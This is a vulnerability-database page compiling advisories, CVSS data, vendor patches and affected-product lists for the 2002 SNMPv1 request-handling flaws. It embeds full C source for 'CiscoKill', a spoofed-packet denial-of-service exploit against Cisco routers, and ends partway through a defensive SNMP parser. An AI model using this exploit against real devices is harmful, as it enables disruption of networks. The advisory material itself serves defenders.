CVE-2002-0013
CVSS 10.0
Published: 2002-02-13 00:00:00
Last modified: 2008-09-10 15:11:03

[Original] Vulnerabilities in the SNMPv1 request handling of a large number of SNMP implementations allow remote attackers to cause a denial of service or gain privileges via (1) GetRequest, (2) GetNextRequest, and (3) SetRequest messages, as demonstrated by the PROTOS c06-SNMPv1 test suite. NOTE: It is highly likely that this candidate will be SPLIT into multiple candidates, one or more for each vendor. This and other SNMP-related candidates will be updated when more accurate information is available.


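[CNNVD] Multiple security vulnerabilities in SNMPv1 request handling in multiple vendors' SNMP implementations (CNNVD-200202-004)

        SNMP requests are messages sent from a management system to an agent system. They typically query the agent for current performance and configuration information, request the next SNMP object in the Management Information Base (MIB), or modify the agent's configuration.
        Multiple vulnerabilities have been found in many SNMP implementations. They occur in the decoding and interpretation of SNMP messages.
        The c06-SNMPv1 test tool developed by the PROTOS group has revealed a large number of security problems in the SNMP request handling of many vendors' SNMP implementations. An attacker may use GetRequest, GetNextRequest, and SetRequest commands to crash a remote SNMP server or even execute arbitrary code with the privileges of the SNMP server. The degree of impact differs between the affected products.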
        

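- CVSS (Base score)

CVSS score: 10 [Severe (HIGH)]
Confidentiality impact: COMPLETE [Total information disclosure, exposing all system files]
Integrity impact: COMPLETE [System integrity can be completely compromised]
Availability impact: COMPLETE [May cause a complete system shutdown]
Attack complexity: LOW [No access restrictions apply to exploitation]
Attack vector: NETWORK [The attacker needs neither internal-network access nor local access]
Authentication: NONE [Exploitation requires no authentication]

- CWE (Weakness category)

CWE-264 [Permissions, Privileges, and Access Controls]

- CPE (Affected platforms and products)

Product and version information (CPE) is not yet available

- OVAL (Technical details for detection)

oval:org.mitre.oval:def:87 SNMPv1 Request Handling DoS and Privilege Escalation
oval:org.mitre.oval:def:298 Windows 2000 SNMPv1 Trap Handling DoS and Privilege Escalation (Test 2)
*OVAL describes in detail how to detect this vulnerability; more technical detail on detection can be found in the related OVAL definitions.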

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0013
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0013
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200202-004
(Official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/854306
(VENDOR_ADVISORY)  CERT-VN  VU#854306
http://www.cert.org/advisories/CA-2002-03.html
(VENDOR_ADVISORY)  CERT  CA-2002-03
http://www.microsoft.com/technet/security/bulletin/MS02-006.asp
(VENDOR_ADVISORY)  MS  MS02-006
http://sunsolve.sun.com/search/document.do?assetkey=1-26-57404-1
(VENDOR_ADVISORY)  SUNALERT  57404
ftp://patches.sgi.com/support/free/security/advisories/20020201-01-A
(VENDOR_ADVISORY)  SGI  20020201-01-A
http://www.redhat.com/support/errata/RHSA-2001-163.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2001:163
http://www.iss.net/security_center/alerts/advise110.php
(VENDOR_ADVISORY)  ISS  20020212 PROTOS Remote SNMP Attack Tool
http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/index.html
(UNKNOWN)  MISC  http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/snmpv1/index.html

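- Vulnerability information

Multiple security vulnerabilities in SNMPv1 request handling in multiple vendors' SNMP implementations
Critical  Unknown
2002-02-13 00:00:00 2005-10-20 00:00:00
Remote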
        
        

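- Advisories and patches

        Workarounds:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * Temporarily disable the SNMP service. If you do not need the SNMP service, disable it immediately.
        * Restrict access to the SNMP service ports of the protected network at the border router or firewall.
        The ports that usually need to be restricted are:
        snmp 161/udp # Simple Network Management Protocol (SNMP)
        snmp 162/udp # SNMP system management messages
        For some affected products, the following services also need to be restricted:
        snmp 161/tcp # Simple Network Management Protocol (SNMP)
        snmp 162/tcp # SNMP system management messages
        smux 199/tcp # SNMP Unix Multiplexer
        smux 199/udp # SNMP Unix Multiplexer
        synoptics-relay 391/tcp # SynOptics SNMP Relay Port
        synoptics-relay 391/udp # SynOptics SNMP Relay Port
        agentx 705/tcp # AgentX
        snmp-tcp-port 1993/tcp # cisco SNMP TCP port
        snmp-tcp-port 1993/udp # cisco SNMP TCP port
        In addition, some SNMP-related RPC services may also need to be restricted:
        snmp 100122 na.snmp snmp-cmc snmp-synoptics snmp-unisys snmp-utk
        snmpv2 100138 na.snmpv2 # SNM Version 2.2.2
        snmpXdmid 100249
        * Block SNMP access from unauthorized internal hosts.
        Because usually only a few management hosts need SNMP access, you can apply access control on the SNMP agent host to reject SNMP requests from unauthorized internal hosts.
        * Change the default SNMP community strings.
        Changing the default read-only and read-write community strings, such as "public" and "private", prevents some of the attacks. However, some attacks do not even require a valid community string.
        Vendor patches: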
        3Com
        ----
        The vendor has released upgrade patches that fix this security issue; download them from the vendor's site:
        3com PS Hub 40 :
        3com Upgrade psh02_16.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-ps-hub-40/psh02_16.exe
        3com PS Hub 50 :
        3com Upgrade psf02_16.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-ps-hub-50/psf02_16.exe
        3com Dual Speed Hub :
        3com Upgrade dsh02_16.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-hub-500/dsh02_16.exe
        3com Switch 1100 :
        3com Upgrade s2s02_68.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-1100/s2s02_68.exe
        3com Switch 4400 :
        3com Upgrade s3m02_02.exe
        ftp://ftp.3com.com/pub/superstack_3/switch_4400/s3m02_02.exe
        3com Switch 4900 :
        3com Upgrade s3g02_04.exe
        
        http://www.3com.com/en_US/layer3/register.html

        3com Switch 3300 :
        3com Upgrade s2s02_68.exe
        ftp://ftp.3com.com/pub/superstack-ii/superstack-ii-1100/s2s02_68.exe
        3com WebCache 1000 :
        3com Upgrade s3b_02_00.bin
        ftp://ftp.3com.com/pub/webcache/agents/s3b_02_00.bin
        3com WebCache 3000 :
        3com Upgrade s3b_02_00.bin
        ftp://ftp.3com.com/pub/webcache/agents/s3b_02_00.bin
        Caldera
        -------
        Caldera has released a security advisory (CSSA-2002-SCO.4) and corresponding patches for this issue:
        CSSA-2002-SCO.4:Open UNIX, UnixWare 7: snmpd memory fault
        Link: ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.4
        Patch downloads:
        Caldera UnixWare 7:
        Caldera OpenServer 5.0:
        Caldera UnixWare 7.1.0:
        Caldera Patch erg711937c.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.4/erg711937c.Z
        Caldera UnixWare 7.1.1:
        Caldera Patch erg711937b.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.4/erg711937b.Z
        Caldera OpenUnix 8.0:
        Caldera Patch erg711937.Z
        ftp://stage.caldera.com/pub/security/openunix/CSSA-2002-SCO.4/erg711937.Z
        Cisco
        -----
        Cisco has released a security advisory (Cisco-malformed-snmp-msgs-pub) and corresponding patches for this issue:
        Cisco-malformed-snmp-msgs-pub:Malformed SNMP Message-Handling Vulnerabilities
        Link:
        http://www.cisco.com/warp/public/707/cisco-malformed-snmp-msgs-pub.shtml

        Debian
        ------
        Debian has released a security advisory (DSA-111-1) and corresponding patches for this issue:
        DSA-111-1:Multiple SNMP vulnerabilities
        Link:
        http://www.debian.org/security/2002/dsa-111

        Patch downloads:
        Debian Upgrade libsnmp4.1-dev_4.1.1-2.1_alpha.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/libsnmp4.1-dev_4.1.1-2.1_alpha.deb

        Debian Upgrade libsnmp4.1_4.1.1-2.1_alpha.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/libsnmp4.1_4.1.1-2.1_alpha.deb

        Debian Upgrade snmp_4.1.1-2.1_alpha.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/snmp_4.1.1-2.1_alpha.deb

        Debian Upgrade snmpd_4.1.1-2.1_alpha.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-alpha/snmpd_4.1.1-2.1_alpha.deb

        Debian Upgrade libsnmp4.1-dev_4.1.1-2.1_arm.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/libsnmp4.1-dev_4.1.1-2.1_arm.deb

        Debian Upgrade libsnmp4.1_4.1.1-2.1_arm.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/libsnmp4.1_4.1.1-2.1_arm.deb

        Debian Upgrade snmp_4.1.1-2.1_arm.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/snmp_4.1.1-2.1_arm.deb

        Debian Upgrade snmpd_4.1.1-2.1_arm.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-arm/snmpd_4.1.1-2.1_arm.deb

        Debian Upgrade libsnmp4.1-dev_4.1.1-2.1_i386.deb
        
        http://security.debian.org/dists/stable/updates/main/binary-i386/libsnmp4.1-dev_4.1.1-2.1_i386.deb

        Debian Upgrade libsnmp4.1_4.1.1-2.1_i386.deb
        

- Vulnerability information (21296)

Cisco IOS 11/12 Malformed SNMP Message Denial of Service Vulnerabilities (EDBID:21296)
hardware dos
2002-02-12 Verified
0 kundera
N/A
source: http://www.securityfocus.com/bid/4132/info

Cisco products contain multiple vulnerabilities in handling of SNMP requests and traps. A general report for multiple vendors was initially published on February 12 (Bugtraq IDs 4088 and 4089), however more information is now available and a separate Bugtraq ID has been allocated for the Cisco Operating Systems and Appliances vulnerabilities.

It is reportedly possible for a remote attacker to create a denial of service condition by transmitting a malformed SNMP request to a vulnerable Cisco Operating System or Appliance. The affected device may reset, or require a manual reset to regain functionality. 

/* This program send a spoofed snmpv1 get request that cause system reboot
   on Cisco 2600 routers with IOS version 12.0(10) 

   Author : kundera@tiscali.it   ... don't be lame use for testing only! ..:) */

#include 		<stdio.h>
#include 		<string.h>
#include 		<unistd.h>
#include 		<stdlib.h>
#include 		<sys/socket.h>
#include 		<netinet/in.h>
#include		<netinet/ip.h>
#include		<netinet/udp.h>
#include		<arpa/inet.h>

	

struct in_addr sourceip_addr;
struct in_addr destip_addr;
struct sockaddr_in dest;

struct ip          *IP;  
struct udphdr      *UDP;   
int p_number=1,sok,datasize,i=0; 

char *packet,*source,*target; 
char *packetck;
char *data,c;

char snmpkill[] =  
  "\x30\x81\xaf\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\xa0\x81"  
  "\xa1\x02\x02\x09\x28\x02\x01\x00\x02\x01\x00\x30\x81\x94\x30\x81"  
  "\x91\x06\x81\x8c\x4d\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"  
  "\x25\x73\x25\x73\x25\x73\x81\xff\xff\xff\xff\xff\xff\xff\xff\x7f"  
  "\x05";


struct pseudoudp {
u_long ipsource;
u_long ipdest;
char zero;
char proto;
u_short length;
} *psudp;


in_cksum (unsigned short *ptr, int nbytes)
{

  register long sum;		/* assumes long == 32 bits */
  u_short oddbyte;
  register u_short answer;	/* assumes u_short == 16 bits */

  /*
   * Our algorithm is simple, using a 32-bit accumulator (sum),
   * we add sequential 16-bit words to it, and at the end, fold back
   * all the carry bits from the top 16 bits into the lower 16 bits.
   */

  sum = 0;
  while (nbytes > 1)
    {
      sum += *ptr++;
      nbytes -= 2;
    }

  /* mop up an odd byte, if necessary */
  if (nbytes == 1)
    {
      oddbyte = 0;		/* make sure top half is zero */
      *((u_char *) & oddbyte) = *(u_char *) ptr;	/* one byte only */
      sum += oddbyte;
    }

  /*
   * Add back carry outs from top 16 bits to low 16 bits.
   */

  sum = (sum >> 16) + (sum & 0xffff);	/* add high-16 to low-16 */
  sum += (sum >> 16);		/* add carry */
  answer = ~sum;		/* ones-complement, then truncate to 16 bits */
  return (answer);
}


void usage (void)
{
printf("Kundera CiscoKill v1.0\n");
printf("Usage: ciscokill [-n number of packets] [-s source ip_addr] -t ip_target \n");
}



int main(int argc,char **argv){

if (argc < 2){
usage();
exit(1);
}

while((c=getopt(argc,argv,"s:t:n:"))!=EOF){
	switch(c) {
	 case 's': source=optarg; break;
	 case 'n': p_number=atoi(optarg); break;
	 case 't': target=optarg;
	 }
}

if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
	printf("Can't create socket.\n");
        exit(EXIT_FAILURE);
}

destip_addr.s_addr=inet_addr(target);
sourceip_addr.s_addr=inet_addr(source);

datasize=sizeof(snmpkill);

packet = ( char * )malloc( 20 + 8 + datasize );

IP     = (struct ip     *)packet; 

memset(packet,0,sizeof(packet)); 
        
        IP->ip_dst.s_addr  = destip_addr.s_addr;
        IP->ip_src.s_addr  = sourceip_addr.s_addr;
        IP->ip_v = 4;
        IP->ip_hl = 5;
        IP->ip_ttl = 245;
        IP->ip_id = htons(666);
        IP->ip_p = 17;
        IP->ip_len  = htons(20 + 8 + datasize);
        IP->ip_sum    = in_cksum((u_short *)packet,20);

 
UDP   = (struct udphdr    *)(packet+20);
      UDP->source = htons(666); 
      UDP->dest   = htons(161);
      UDP->len     = htons(8+datasize);
      UDP->check = 0;
      packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));
      bzero(packetck,8 + datasize + sizeof(struct pseudoudp));     
      psudp = (struct pseudoudp *) (packetck);
      psudp->ipdest = destip_addr.s_addr;
      psudp->ipsource = sourceip_addr.s_addr;
      psudp->zero = 0;
      psudp->proto = 17;
      psudp->length = htons(8+datasize);
      memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);
      memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);

      UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));    

data   = (unsigned char    *)(packet+20+8); 
memcpy(data,snmpkill,datasize);  
                                                                                                     
dest.sin_family=AF_INET;
dest.sin_addr.s_addr=destip_addr.s_addr;                                                                        

while (i<p_number)
{
if (( sendto(sok,packet,20+8+datasize,0,( struct sockaddr * ) &dest,sizeof(dest)))<0)
{
printf("Error sending packet.\n");
exit(EXIT_FAILURE);
}

i++;

}
printf("%d packets sent.\n",i);

}




		

- Vulnerability information

2321
Emulex FibreChannel Hub SNMP Trap DoS
Denial of Service
Loss of Availability

- Vulnerability description

Unknown or Incomplete

- Timeline

2003-07-28 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

Multiple Vendor SNMP Request Handling Vulnerabilities
Unknown 4089
Yes No
2002-02-12 12:00:00 2009-07-11 10:56:00
Discovered by the Oulu University Secure Programming Group.

- Affected program versions

Sun SunNet Manager Sparc 2.3
Sun SunNet Manager Intel 2.3
Sun SunMC 3.0 RR
- Sun Solaris 2.5.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Sun SunMC 3.0
- Sun Solaris 2.5.1
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
Sun SunMC 2.1.1
Sun SunATM 5.0
Sun SunATM 4.0.1
- Sun Solaris 2.5.1
- Sun Solaris 2.7
- Sun Solaris 2.6
Sun SunATM 3.0.1
Sun SunATM 2.1
- Sun Solaris 2.5.1
- Sun Solaris 2.6
Sun Enterprise 10000 Server SSP 3.5
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Sun Enterprise 10000 Server SSP 3.4
Sun Enterprise 10000 Server SSP 3.3
SNMP Research Mid-Level Manager 15.3
SNMP Research Enterpol 15.3
SNMP Research DR-Web Manager 15.3
SGI Emulex 1Gbit FibreChannel Hub
SGI Brocade 2.6 .0
RedBack Networks AOS
Real Networks RealPlayer Intranet 5.0
Process Software TCPWare 5.5
Process Software Multinet 4.4
Oracle Enterprise Manager 9.0.1
Oracle Enterprise Manager 2.2
Oracle Enterprise Manager 2.1
Oracle Enterprise Manager 2.0
Oracle Enterprise Manager 1.6.5
Novell Netware 6.0
Novell Netware 5.1
Novell Netware 5.0
Novell Netware 4.11
Novell Netware 4.2
Novell Netware 4.0
Nokia IPSO 3.4.1
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1
Nokia IPSO 3.4
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1
+ Nokia IP380
Nokia IPSO 3.3.1
Nokia IPSO 3.3
Nokia IPSO 3.1.3
Net-SNMP ucd-snmp 4.2.1
Net-SNMP ucd-snmp 4.1.1
Microsoft Windows XP Professional
Microsoft Windows XP Home
Microsoft Windows NT Workstation 4.0 SP6a
Microsoft Windows NT Workstation 4.0 SP6
Microsoft Windows NT Workstation 4.0 SP5
Microsoft Windows NT Workstation 4.0 SP4
Microsoft Windows NT Workstation 4.0 SP3
Microsoft Windows NT Workstation 4.0 SP2
Microsoft Windows NT Workstation 4.0 SP1
Microsoft Windows NT Workstation 4.0
Microsoft Windows NT Terminal Server 4.0 SP6
Microsoft Windows NT Terminal Server 4.0 SP5
Microsoft Windows NT Terminal Server 4.0 SP4
Microsoft Windows NT Terminal Server 4.0 SP3
Microsoft Windows NT Terminal Server 4.0 SP2
Microsoft Windows NT Terminal Server 4.0 SP1
Microsoft Windows NT Terminal Server 4.0
Microsoft Windows NT Server 4.0 SP6a
Microsoft Windows NT Server 4.0 SP6
Microsoft Windows NT Server 4.0 SP5
Microsoft Windows NT Server 4.0 SP4
Microsoft Windows NT Server 4.0 SP3
Microsoft Windows NT Server 4.0 SP2
Microsoft Windows NT Server 4.0 SP1
Microsoft Windows NT Server 4.0
Microsoft Windows NT Enterprise Server 4.0 SP6a
Microsoft Windows NT Enterprise Server 4.0 SP6
Microsoft Windows NT Enterprise Server 4.0 SP5
Microsoft Windows NT Enterprise Server 4.0 SP4
Microsoft Windows NT Enterprise Server 4.0 SP3
Microsoft Windows NT Enterprise Server 4.0 SP2
Microsoft Windows NT Enterprise Server 4.0 SP1
Microsoft Windows NT Enterprise Server 4.0
Microsoft Windows 98SE
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows 2000 Terminal Services SP2
+ Microsoft Windows 2000 Advanced Server SP2
+ Microsoft Windows 2000 Datacenter Server SP2
+ Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Terminal Services SP1
Microsoft Windows 2000 Terminal Services
+ Microsoft Windows 2000 Advanced Server
+ Microsoft Windows 2000 Datacenter Server
+ Microsoft Windows 2000 Server
Microsoft Windows 2000 Server SP2
Microsoft Windows 2000 Server SP1
Microsoft Windows 2000 Server
+ Avaya DefinityOne Media Servers
+ Avaya IP600 Media Servers
+ Avaya S3400 Message Application Server 0
+ Avaya S8100 Media Servers 0
Microsoft Windows 2000 Professional SP2
Microsoft Windows 2000 Professional SP1
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Datacenter Server SP2
Microsoft Windows 2000 Datacenter Server SP1
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Advanced Server SP2
Microsoft Windows 2000 Advanced Server SP1
Microsoft Windows 2000 Advanced Server
Lotus Domino SNMP Agents 5.0.1 Solaris x86
+ Lotus Domino 5.0.9 a
+ Lotus Domino 5.0.9
+ Lotus Domino 5.0.8
+ Lotus Domino 5.0.7 a
+ Lotus Domino 5.0.7
+ Lotus Domino 5.0.6
+ Lotus Domino 5.0.5
+ Lotus Domino 5.0.4
+ Lotus Domino 5.0.3
+ Lotus Domino 5.0.2
+ Lotus Domino 5.0.1
+ Lotus Domino 5.0
Lotus Domino SNMP Agents 5.0.1 Solaris SPARC
Lotus Domino SNMP Agents 5.0.1 HP-UX
Lantronix LRS
Juniper Networks JUNOS 5.1
Juniper Networks JUNOS 5.0
Innerdive Solutions Router IP Console 3.3 .0.406
IBM AIX 4.3.3
IBM AIX 4.3.2
IBM AIX 4.3.1
IBM AIX 4.3
IBM AIX 5.1
HP Secure OS software for Linux 1.0
HP Procurve Switch 8000M
HP Procurve Switch 4108GL-bundle
HP Procurve Switch 4108GL
HP Procurve Switch 4000M
HP Procurve Switch 2525
HP Procurve Switch 2524
HP Procurve Switch 2512
HP Procurve Switch 2424M
HP Procurve Switch 2400M
HP Procurve Switch 1600M
HP OV/SAM 3.0.1
HP OpenView Network Node Manager 6.10
HP OpenView Network Node Manager 6.2 Solaris
HP OpenView Network Node Manager 6.2 HP-UX 11.X
HP OpenView Network Node Manager 6.2 HP-UX 10.X
HP OpenView Network Node Manager 6.2
HP OpenView Network Node Manager 6.1 Solaris
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
- Sun Solaris 2.4
HP OpenView Network Node Manager 6.1 HP-UX 11.X
HP OpenView Network Node Manager 6.1 HP-UX 10.X
HP OpenView Network Node Manager 6.0 Solaris
HP OpenView Network Node Manager 6.0 NT 4.X/Windows 2000
HP OpenView Network Node Manager 6.0 HP-UX 11.X
HP OpenView Network Node Manager 6.0 HP-UX 10.20
HP OpenView Network Node Manager 5.0.2 Windows NT 3.51/4.0
HP OpenView Network Node Manager 5.0 1 Solaris
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
- Sun Solaris 2.4
HP OpenView Network Node Manager 5.0 1 HP-UX
- HP HP-UX 10.34
- HP HP-UX 10.30
- HP HP-UX 10.20
- HP HP-UX 10.16
- HP HP-UX 10.10
- HP HP-UX 10.9
- HP HP-UX 10.8
- HP HP-UX 10.1 0
- HP HP-UX 10.0 1
- HP HP-UX 10.0
- HP HP-UX (VVOS) 10.24
HP OpenView Network Node Manager 5.0 1
- HP HP-UX 11.0
- HP HP-UX 10.20
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
HP OpenView Network Node Manager 4.1 1 Solaris
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
- Sun Solaris 2.5
- Sun Solaris 2.4
HP OpenView Network Node Manager 4.1 1 HP-UX
HP OpenView Extensible SNMP Agent 4.0
HP OpenView Emanate SNMP Agent 14.2 Solaris 2.X
HP OpenView Emanate SNMP Agent 14.2 HP-UX 11.X
HP OpenView Emanate SNMP Agent 14.2 HP-UX 10.20
HP OpenView Distributed Management 6.0
HP OpenView Distributed Management 5.0 3
HP MPE/iX 6.5
HP MPE/iX 6.0
HP MPE/iX 5.5
HP MPE/iX 5.0
HP MPE/iX 4.5
HP MPE/iX 4.0
HP MC/ServiceGuard
HP JetDirect x.20.00
HP JetDirect x.08.00
HP ITO/VPO/OVO Unix 6.0
HP HP-UX (VVOS) 11.0 4
HP HP-UX (VVOS) 10.24
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX 10.20
HP HP-UX 10.10
HP HP-UX 10.0
HP EMS A.03.20
HP EMS A.03.10
HP EMS A.03.00
GNU gzip 3.1 .02
Comtek Services NMServer 3.4
- Compaq OpenVMS 7.3 VAX
- Compaq OpenVMS 7.3 Alpha
- Compaq OpenVMS 7.2 -2 Alpha
- Compaq OpenVMS 7.2 -1H1 Alpha
- Compaq OpenVMS 7.2 VAX
- Compaq OpenVMS 7.1 -2 Alpha
- Compaq OpenVMS 7.1 VAX
- Compaq OpenVMS 7.1 Alpha
- Compaq OpenVMS 6.2 VAX
- Compaq OpenVMS 6.2 Alpha
- Compaq OpenVMS 6.2
Computer Associates Unicenter
Caldera UnixWare 7.1.1
Caldera UnixWare 7.1 .0
Caldera UnixWare 7
Caldera OpenUnix 8.0
Caldera OpenServer 5.0.6
Caldera OpenServer 5.0.5
CacheFlow CacheOS 4.0.14
CacheFlow CacheOS 4.0.13
CacheFlow CacheOS 4.0.12
CacheFlow CacheOS 4.0.11
CacheFlow CacheOS 4.0
CacheFlow CacheOS 3.1.21
CacheFlow CacheOS 3.1.19
CacheFlow CacheOS 3.1.18
CacheFlow CacheOS 3.1.17
CacheFlow CacheOS 3.1.16
CacheFlow CacheOS 3.1.15
CacheFlow CacheOS 3.1.14
CacheFlow CacheOS 3.1.13
CacheFlow CacheOS 3.1.12
CacheFlow CacheOS 3.1.11
CacheFlow CacheOS 3.1 .20
CacheFlow CacheOS 3.1 .10
CacheFlow CacheOS 3.1 .09
CacheFlow CacheOS 3.1 .08
CacheFlow CacheOS 3.1 .07
CacheFlow CacheOS 3.1 .06
CacheFlow CacheOS 3.1 .05
CacheFlow CacheOS 3.1 .04
CacheFlow CacheOS 3.1 .03
CacheFlow CacheOS 3.1 .02
CacheFlow CacheOS 3.1
CacheFlow CacheOS
AdventNet Web NMS MSP Edition
AdventNet Web NMS
AdventNet SNMP Utilities
AdventNet SNMP API
AdventNet Mediation Server
AdventNet Management Builder
AdventNet Fault Management Toolkit
AdventNet Configuration Management Toolkit
AdventNet CLI API
AdventNet Agent Toolkit Java/JMX Edition
AdventNet Agent Toolkit - C Edition
3Com WebCache 3000
3Com WebCache 1000
3Com Switch 4900
3Com Switch 4400
3Com Switch 3300
3Com Switch 1100
3Com PS Hub 50
3Com PS Hub 40
3Com Dual Speed Hub

- Unaffected program versions

SGI Brocade 2.6 .0d
Nokia IPSO 3.4.2
+ Check Point Software Firewall-1 4.1 SP5
+ Check Point Software Firewall-1 4.1 SP4
+ Check Point Software Firewall-1 4.1 SP3
+ Check Point Software Firewall-1 4.1 SP2
+ Check Point Software Firewall-1 4.1 SP1
+ Check Point Software Firewall-1 4.1
+ Check Point Software Firewall-1 4.0 SP8
+ Check Point Software Firewall-1 4.0 SP7
+ Check Point Software Firewall-1 4.0 SP6
+ Check Point Software Firewall-1 4.0 SP5
+ Check Point Software Firewall-1 4.0 SP4
+ Check Point Software Firewall-1 4.0 SP3
+ Check Point Software Firewall-1 4.0 SP2
+ Check Point Software Firewall-1 4.0 SP1
+ Check Point Software Firewall-1 4.0
+ Check Point Software VPN-1 4.1 SP4
+ Check Point Software VPN-1 4.1 SP3
+ Check Point Software VPN-1 4.1 SP2
+ Check Point Software VPN-1 4.1 SP1
+ Check Point Software VPN-1 4.1
Net-SNMP ucd-snmp 4.2.2
Innerdive Solutions Router IP Console 3.3 .0.407
HP JetDirect x.21.00
HP JetDirect x.08.32

- Discussion

SNMP requests are messages sent from manager to agent systems. They typically poll the agent for current performance or configuration information, ask for the next SNMP object in a Management Information Base (MIB), or modify the configuration settings of the agent.

Multiple vulnerabilities have been discovered in a number of SNMP implementations. The vulnerabilities are known to exist in the process of decoding and interpreting SNMP request messages.

Among the possible consequences are denial of service and allowing attackers to compromise target systems. These depend on the individual vulnerabilities in each affected product.
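
A defensive illustration of the decoding problem described above, added here and not taken from any vendor's agent or advisory: a strict structural pre-check for SNMPv1 request datagrams that bounds every BER length against its enclosing container before any field is interpreted. The function names, the size limits and the sample message are assumptions constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum { SNMP_OK = 0, SNMP_ERR_BER = -1, SNMP_ERR_VERSION = -2,
       SNMP_ERR_PDU = -3, SNMP_ERR_LIMIT = -4 };
/* Policy limits: assumptions for this example, not protocol constants. */
#define MAX_COMMUNITY 64
#define MAX_OID_BYTES 64
#define MAX_VARBINDS  32

typedef struct { const uint8_t *p, *end; } cur_t;   /* bounded read cursor */
typedef struct {
    uint8_t pdu_tag;            /* 0xA0 Get, 0xA1 GetNext, 0xA3 Set */
    int     default_community;  /* 1 if community is "public" or "private" */
    int     varbinds;           /* variable bindings seen */
} snmp_summary;

/* Read one TLV; the declared length must fit in the bytes left in *c. */
static int read_tlv(cur_t *c, uint8_t *tag, cur_t *body)
{
    size_t len, n;
    if (c->end - c->p < 2) return SNMP_ERR_BER;
    *tag = c->p[0];
    len = c->p[1];
    c->p += 2;
    if (len & 0x80) {                   /* long form: 1..4 length octets */
        n = len & 0x7f;                 /* n == 0 is the indefinite form */
        if (n == 0 || n > 4 || (size_t)(c->end - c->p) < n) return SNMP_ERR_BER;
        for (len = 0; n > 0; n--) len = (len << 8) | *c->p++;
    }
    if (len > (size_t)(c->end - c->p)) return SNMP_ERR_BER;
    body->p = c->p; body->end = c->p + len;
    c->p += len;
    return SNMP_OK;
}

static int expect(cur_t *c, uint8_t want, cur_t *body)
{
    uint8_t tag;
    return (read_tlv(c, &tag, body) == SNMP_OK && tag == want) ? SNMP_OK : SNMP_ERR_BER;
}

/* Structural check of one UDP payload as an SNMPv1 Get/GetNext/Set request. */
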